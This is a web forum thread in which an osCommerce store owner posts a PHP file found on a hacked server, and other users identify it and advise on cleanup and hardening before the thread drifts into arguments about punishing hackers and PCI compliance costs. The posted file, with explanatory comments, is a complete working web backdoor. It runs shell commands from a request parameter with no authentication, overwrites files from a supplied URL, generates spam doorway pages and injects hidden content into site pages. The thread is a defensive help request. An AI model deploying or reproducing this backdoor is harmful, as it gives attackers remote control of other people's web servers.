

I think my store was hacked?


Magma-tech


Can anyone help me, I think my store was hacked, I cannot get into my admin control panel. When I went into my webshell

there was a new php file that I don't remember being there. I will post it below, and if anyone has any idea on what it does I would like to know.... Thanks

 

File Folder Name : Neski

 

Inside was file : hmx.php

 

<?php
// Bootstrap of the dropped script (posted as Neski/hmx.php): the two calls below
// keep the request running after the client disconnects and remove the
// execution-time limit, so the long file-writing loop in Gen() cannot be cut
// short by the web server. Both are typical of an unattended web backdoor.

ignore_user_abort(1);

set_time_limit(0);

 

// Removes the script's own state files from the current directory:
// "c" (state written by Gen()), "1r" (map list appended by Gen()) and "log"
// (not referenced elsewhere in this listing). Triggered via the "cl" request
// parameter in Main(); used to wipe traces, so their absence on a compromised
// host does not mean the script was never run.
function Clear()

{

unlink("c");

unlink("1r");

unlink("log");

}

 

// Undoes the content injection performed by MRepl(): reads the relative path of
// the victim page from the local file "m", loads "../<that path>" (one directory
// above the script), strips everything between the <dd4>...<dd5> /
// <!--dd4-->...<!--dd5--> markers, links whose markup contains "_lm" or
// "http...tmp6", and the zero-size hidden <font> wrapper, then writes the page
// back in place. Prints " upt-ok" as an acknowledgement to the caller.
// Triggered via the "cl2" request parameter. Note ereg_replace() was removed in
// PHP 7, so this branch only works on legacy PHP 5 hosts.
function Clear2()

{

$mrd = trim(file_get_contents("m"));

$pt = "../$mrd";

$fin = file_get_contents($pt);

$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);

$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);

$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);

$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);

$fin = ereg_replace("<!--dd4-->", "", $fin);

$fin = ereg_replace("<!--dd5-->", "", $fin);

// same hidden wrapper MRepl() prepends to the injected block
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);

$fmrd = fopen($pt, "w+");

fwrite($fmrd, $fin);

fclose($fmrd);

echo " upt-ok";

}

 

// Reads request parameter $name into $var, checking POST first and then GET
// (a GET value overrides a POST one). $var is reset to "" before the lookup.
// Returns false when the resulting value is an empty string, true otherwise.
// No validation or escaping is applied; callers (MRepl()) pass the raw value
// straight to fopen().
function GetVar($name, &$var)

{

$var = "";

if (isset($_POST[$name]))

$var = $_POST[$name];

 

if (isset($_GET[$name]))

$var = $_GET[$name];

 

if (($var) =="")

return false;

else return true;

}

 

// Page generator ("doorway"/spam page dropper). Triggered via the "g" request
// parameter in Main(). Reads two attacker-supplied values: "sg" (a prefix that
// is concatenated with "2.txt" and "sgen.php?g=..." and handed to fopen(), so
// with allow_url_fopen enabled it is a remote URL prefix) and "gm" (the current
// keyword/category, stored as $curs). Persists progress in the local file "c"
// (4 lines: top dir, sub dir, current keyword, next page index) and appends the
// path of each "_lm.htm" index page to "1r". Each run writes ten .htm files
// named "<keyword>_<n>.htm" under a randomly named directory tree; after page
// 100 it starts a fresh sub directory. On the first run it also drops an
// .htaccess (contents fetched from "<sg>2.txt") into the new top directory.
// Incident responders: look for short random-letter directories (5 chars, then
// 3 chars) containing many "*_N.htm" files plus an .htaccess, and for the
// files "c", "1r" and "m" next to this script.
function Gen()

{

// 27-char alphabet for random directory names; mt_rand(0,26) indexes it fully
$alp = "abcdefghiklmnjsweqrtyuiopzx";

$maps = array();

if (isset($_POST["sg"]))

$sg = $_POST["sg"];

 

if (isset($_GET["sg"]))

$sg = $_GET["sg"];

 

if (isset($_POST["gm"]))

$g = $_POST["gm"];

 

if (isset($_GET["gm"]))

$g = $_GET["gm"];

 

 

// $path stays empty, so the entries written to "1r" start with "/"
$path = "";

$fr = fopen("1r", "a+");

// Resume from saved state if "c" exists, otherwise build a new directory tree.
if (file_exists("c"))

{

$fconf = file("c");

$tname = trim($fconf[0]);

$cname = trim($fconf[1]);

$curs = trim($fconf[2]);

$pid = trim($fconf[3]);

// After 100 pages, start a new 3-letter sub directory and restart numbering.
if ($pid == 100)

{

$pid = 0;

$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<3; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$cname = $nm;

mkdir("$tname/$cname");

$curs = $g;

}

}

else

{

// First run: 5-letter top directory with a dropped .htaccess, plus a
// 3-letter sub directory.
$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<5; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$tname = $nm;

$pid = 0;

$curs = $g;

mkdir($tname);

$fht = fopen("$tname/.htaccess", "w+");

// .htaccess body is fetched from "<sg>2.txt", not generated locally
$htname = $sg."2.txt";

$fp = fopen($htname, "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

fwrite($fht, $fin);

fclose($fht);

$rnd = mt_rand(0, 999);

$nm = "";

for ($i=0; $i<3; $i++)

{

$ran = mt_rand(0,26);

$sym = $alp[$ran];

$nm = $nm.$sym;

}

$cname = $nm;

mkdir("$tname/$cname");

}

// Page bodies come from "<sg>sgen.php?g=<keyword>" - the query string shows
// this is meant to be fetched over HTTP, not read from a local file.
$gname = $sg."sgen.php";

for ($j=$pid; $j<$pid+10; $j++)

{

$fp = fopen($gname."?g=$curs", "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

 

$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");

fwrite($fnd, $fin);

fclose($fnd);

}

 

// Once the 100th page is written, fetch an index page ("m=1") as
// "<keyword>_lm.htm" and record its path in "1r" for later linking
// (see the "_lm" anchors that Clear2() removes).
if ($j==100)

{

$fp = fopen($gname."?g=$curs&m=1", "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");

fwrite($fnd, $fin);

fclose($fnd);

$map = "$path/$tname/$cname/$curs"."_lm.htm";

fwrite($fr,"$map\n");

}

 

// Persist state for the next invocation: dir, sub dir, keyword, next index.
$fconf = fopen("c", "w+");

fwrite($fconf, $tname."\n");

fwrite($fconf, $cname."\n");

fwrite($fconf, $curs."\n");

$nj = $j;

fwrite($fconf, $nj."\n");

fclose($fconf);

}

 

// Overwrites the local file "1.php" with the contents of whatever the "u"
// request parameter points to (fopen() on the raw value; with allow_url_fopen
// enabled this can be a remote URL). This is an arbitrary-file-write /
// self-update primitive: the dropped name "1.php" differs from the name this
// copy was found under (hmx.php), so a second PHP file may appear next to it.
// Triggered via the "u" request parameter in Main().
function Update()

{

$thisname = "1.php";

if (isset($_POST['u']))

$u = $_POST['u'];

 

if (isset($_GET['u']))

$u = $_GET['u'];

 

$fp = fopen($u, "r");

$fin = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

if (!$fc) break;

$fin .= $fc;

}

fclose($fp);

 

$fthis = fopen($thisname, "w+");

fwrite($fthis, $fin);

fclose($fthis);

}

 

// Remote command execution: passes the raw "c" request parameter to system()
// with the web server's privileges. The "@" suppresses any PHP warning, and
// system() echoes command output back in the HTTP response. This single
// function is what makes the file a full back door; everything else is
// tooling built on top of it. Triggered via the "c" request parameter in Main().
function Com()

{

if (isset($_POST['c']))

@system($_POST['c']);

if (isset($_GET['c']))

@system($_GET['c']);

}

 

// Hidden-content injection into an existing page. Reads the victim page path
// from the local file "m" (relative to the parent directory), removes the
// closing </body></html> tags and any previous <dd4>/<dd5> payload, then
// appends a block read from the "mpt" request parameter (fopen() on the raw
// value) wrapped in a zero-size, overflow-hidden <font> element between
// <dd4> and <dd5> markers, and writes the page back. The result is content
// invisible to visitors but present in the HTML served to crawlers. Clear2()
// reverses this. Triggered via the "s" request parameter in Main().
function MRepl()

{

$mpt = "";

$drs = "";

// markers used to find and later strip the injected block
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">";

$endtag = "</font></body></html><dd5> ";

$mrd = trim(file_get_contents("m"));

$pt = "../$mrd";

$fin = file_get_contents($pt);

GetVar("mpt", $mpt);

// remove the closing html tags (original comment was mojibake-encoded Russian)

$fin = preg_replace ("/<\/body>/i", "", $fin);

$fin = preg_replace ("/<\/html>/i", "", $fin);

$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);

$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);

$fp = fopen($mpt, "r");

$drs = '';

while (!feof($fp))

{

$fc = fgets($fp, 1024);

// unlike the readers in Gen()/Update(), a short/empty read aborts the
// request here without writing anything back
if (!$fc)

{

exit();

}

$drs .= $fc;

}

fclose($fp);

$fin = $fin.$begtag;

$fin = $fin.$drs;

$fin = $fin.$endtag;

$fmrd = fopen($pt, "w+");

fwrite($fmrd, $fin);

fclose($fmrd);

}

 

// Request dispatcher. The presence of a single GET or POST parameter selects
// the action: "u" = replace 1.php (Update), "c" = run shell command (Com),
// "g" = drop doorway pages (Gen), "s" = inject hidden content (MRepl),
// "cl" = delete state files (Clear), "cl2" = strip injected content (Clear2).
// Each branch exits after running. With no recognised parameter the script
// prints "<ok>", a liveness response a controller can poll for - a useful
// string to grep web server access/response logs for.
function Main()

{

if (isset($_POST['u']) || isset($_GET['u']))

{

Update();

exit();

}

 

if (isset($_POST['c']) || isset($_GET['c']))

{

Com();

exit();

}

 

if (isset($_POST['g']) || isset($_GET['g']))

{

Gen();

exit();

}

 

if (isset($_POST['s']) || isset($_GET['s']))

{

MRepl();

exit();

}

 

if (isset($_POST['cl']) || isset($_GET['cl']))

{

Clear();

exit();

}

 

if (isset($_POST['cl2']) || isset($_GET['cl2']))

{

Clear2();

exit();

}

 

echo "<ok>";

 

}

 

// Entry point: every HTTP request to this file goes straight to the dispatcher
// with no authentication of any kind.
Main();

 

?>


Seems like it might be, because when I googled it the word "Neski" came up with some files from a movie... which means there might be a hack. You can call your host and see if they can give you any info... my host is really good at identifying strange things for me.

A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!


delete that file as soon as you can.

 

it's a back door - it allows the user to run programs and manipulate your web site. time to take a look at your logs and find out how this got there and to implement some security measures.


It is most definitely a hack. You most likely have other files and/or edited files throughout your site.

 

Best thing to do is erase the entire site and re-install a known good backup. Short of that, you need to manually check directories for new files and manually edit files for changes. Personally, I'd go with the first option :)

 

Hopefully, they didn't mess with your database.

 

Install these security mods and make sure that NO directory is set at 777. Putting an .htpasswd file on admin would be a good idea as well. The built in passwording can be defeated.

 

Good luck!


Is this true? Can you please explain this a little bit more?

 

BJ

 

 

If hackers know where your admin directory is, they can run a password cracker program against it and try many (possibly thousands?) of username/password combinations a second. This attack does not throw up any flags to the server administrators, so the hacker can keep brute forcing your door till they get in.

 

One thing you can do is change the directory name from admin to something else. A long string of random letters and numbers would be best. If they can't find the admin directory, they can't attempt to log in. This, however, is a terrible security method by itself. It gives a false sense of security. Hackers can attempt to brute force a dictionary attack to find your "hidden" admin. The longer the name and more cryptic it is, the harder it will be but a determined hacker 'could' find it no matter what you name it. Clearly, you would not want to enter the 'hidden' admin directory name into your robots.txt file and you would want to make sure you don't store your access logs in a readable area. Either of those would give up the name.

 

If you use a .htpasswd file to password protect your admin directory and a hacker runs a password cracker on it, the system will be alerted after x number of attempts and ban the IP. That's assuming of course the server is setup properly. It would be prudent to check with them to be sure.

 

Another method would be to create an .htaccess file that denies access to everyone except specific IPs. However, if your provider supplies you with a dynamic IP (which is pretty common), this method would be problematic.

 

Hope that helps!


If hackers know where your admin directory is, they can run a password cracker program against it and try many (possibly thousands?) of username/password combinations a second. This attack does not throw up any flags to the server administrators, so the hacker can keep brute forcing your door till they get in.

 

One thing you can do is change the directory name from admin to something else. A long string of random letters and numbers would be best. If they can't find the admin directory, they can't attempt to log in. This, however, is a terrible security method by itself. It gives a false sense of security. Hackers can attempt to brute force a dictionary attack to find your "hidden" admin. The longer the name and more cryptic it is, the harder it will be but a determined hacker 'could' find it no matter what you name it. Clearly, you would not want to enter the 'hidden' admin directory name into your robots.txt file and you would want to make sure you don't store your access logs in a readable area. Either of those would give up the name.

 

If you use a .htpasswd file to password protect your admin directory and a hacker runs a password cracker on it, the system will be alerted after x number of attempts and ban the IP. That's assuming of course the server is setup properly. It would be prudent to check with them to be sure.

 

Another method would be to create an .htaccess file that denies access to everyone except specific IPs. However, if your provider supplies you with a dynamic IP (which is pretty common), this method would be problematic.

 

Hope that helps!

 

Thank you very much!


Thank You....

 

It is a hack, and lucky for me I just got my store opened, but did not have any customers yet. I thought I had the admin directory password protected with .htaccess, but if that is not enough and I need to change the name also...well, that I did not do. I sure would like to see the gov't. make it a death penalty crime to hack into people's sites. The punishment should fit the crime. IE: If you have done damage, you need to make 100% restitution to the people that you have damaged. If you can't pay them back because the damage is more than you can make restitution for, then it is an automatic life in prison or the death penalty. IE: you cost me two months of work...you owe me two months of work. You hack 10,000 computers costing untold man hours in damage you can't make restitution for, then you need to be willing to suffer the consequence of giving up your life in return as payment. And no age limit..... you're a snot-nosed 16-yr.-old thinking it's fun to destroy others' livelihood, well

then give them life without parole.

 

Anyone want to form a coalition to petition legislators to pass the law? With all the credit card thefts, identity thefts, lost man hours, and cost to us it is about time for such a law. I just got a letter on top of my crash yesterday from my Merchant Account gateway service from First Data of a new mandatory Data Security Requirements. By November 1st. 2008 they are requiring all credit card merchants to be PCI DSS compliant, or they are going to charge my account an extra $20 per month in any month that am not compliant. They give you Security Metrics as an option to get certified, but it cost me an extra $139 per year for their service. I already pay $64 per month for the privilege just to be able to process credit cards. So my yearly total is $767.00 for the merchant account $139 for the certification = $907 per year without even making a sale. The whole idea for having the merchant account was that the credit card was processed by the gateway as a middle man so I don't ever see the credit card, I have no credit card data stored on my end, I pay yearly for SSL .... now this.... guess what..I'm going back to checks through the mail only, and or company P.O.'s

 

Lucky for me I am a wholesale distributor with exclusive rights so I have no competition. But for all you others, this is what the crime of identity theft is costing you. Now the credit card companies want to make you, the merchant pay for it. Also as a little incentive to get me certified, "which the company has a disclaimer for by the way", the letter I got from them had a little threat along with it...quote ..."Merchants can be fined upwards of $1 million if their customers' credit card information is lost or stolen" ...... end quote. So these little hack jobs are now costing you and me our livelihoods, and they get off with a slap on the hand. As for me I can't afford a $1 million dollar threat hanging over my head because of some hack...so I am closing my merchant account, I will save an extra $907 per year I will take check, money order, cashier check, cash, company P.O., ...... I expect the credit card companies to protect me the merchant for all I give them, not the other way around.


A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!


 

Both of those are fine, but they are not the deterrent that the death penalty would have on the crime. Also those two are still not real protection from it happening to you or me..... the threat is still there. While the death penalty would not stop all of it either, .... It would take out those that where for the fun of it...what would be left are the hard core criminals that would deserve the death penalty.


OMG, the death penalty for hacking? Is that what you're suggesting????? You're joking right?

 

NO I am not joking ! If you cannot pay a restitution for the damage you caused, the penalty should be

the forfeiture of your life. The damage that hackers cost is getting out of control. If there is no accountability

the crime will continue until there is a collapse of society.... And you don't have a clue what a collapse of society

would be like in this day and age. With all the technology it takes to get you your daily food, and necessities of life,

...it is worth the death penalty to stop it.


I got the same letter as Magma-tech. I must be scanned and fill out the SAQ even though I am a level 4 merchant. My web host cannot change all the settings required to pass the scan on my current shared server, so now I must pay for a dedicated server in order to pass the scanning rule.

 

I can either quit selling online or pay the money. So I agree we need to put a stop to hackers.

 

Prison is for rehabilitation. If your age + your prison sentence = a number over 100, you will not live to be rehabilitated. So why bother? It is my tax money and I do not care to spend it keeping a thief alive.

 

Tim


i think the biggest problem with cyber crime is that the us government will not investigate or even attempt to prosecute a suspected criminal unless the victim has incurred losses in excess of $5000.

 

that's a pretty steep entry. and most web sites don't do that much in a month, so it would be hard to prove that you have been victimized by computer crime if you can't show that you've been harmed to the tune of $5000. until that changes it's going to be hard to prosecute anyone. that, and the fact that it's hard to get russia (or whatever country your hacker happens to live in) to extradite someone for computer crime when you're out $1000. it's just not enough for the feds to worry about when they have bank robbers and such to go after.

 

we just have to do the best we can to protect our web sites so these guys can't just walk in the back door.


i think the biggest problem with cyber crime is that the us government will not investigate or even attempt to prosecute a suspected criminal unless the victim has incurred losses in excess of $5000.

 

that's a pretty steep entry. and most web sites don't do that much in a month, so it would be hard to prove that you have been victimized by computer crime if you can't show that you've been harmed to the tune of $5000. until that changes it's going to be hard to prosecute anyone. that, and the fact that it's hard to get russia (or whatever country your hacker happens to live in) to extradite someone for computer crime when you're out $1000. it's just not enough for the feds to worry about when they have bank robbers and such to go after.

 

we just have to do the best we can to protect our web sites so these guys can't just walk in the back door.

 

The problem isn't that they (federal government/state/county/city) won't pursue many "lesser" crimes. The problem is that the people repeatedly ask them not to. Less taxes and smaller government sounds great... then folks wonder why their favorite programs are being cut. Our county jail came very close to being closed a few years ago for lack of funding. A nearby city doesn't even have a police force. The residents wouldn't pay for it!

 

The only way that cyber crime (involving relatively low amounts of money) will receive the enforcability that it deserves is for people to write their appropriate representatives and ask for a tax to pay for it. Clearly that's not going to happen so I doubt we will ever see any change.


Really, you can pay all the taxes that you want, but nothing will be enough to be able to get that Lithuanian hacker over into our country to prosecute them. The issue is that hackers are GLOBAL: they can do damage in one country while actually being in another. So who prosecutes? BOTH? Good luck getting some of those countries to cooperate in apprehending the hacker so the US government can extradite them. It just isn't going to happen, unfortunately.

 

What i DO think should happen is that these "hacking companies" the BIG GUYS who do this for a living SHOULD be prosecuted. If the government can find out that a company is making money off of targeting innocents, THEN they should go after them.. that is basically what the honeypot is. They collect information to help figure out where the majority of the issues are coming from and they bring a case up with lots of evidence.

A great place for newbies to start

Road Map to oscommerce File Structure

DO NOT PM ME FOR HELP. My time is valuable, unless i ask you to PM me, please dont. You will get better help if you post publicly. I am not as good at this as you think anyways!

 

HOWEVER, you can visit my blog (go to my profile to see it) and post a question there, i will find time to get back and answer you

 

Proud Memeber of the CODE BREAKERS CLUB!!

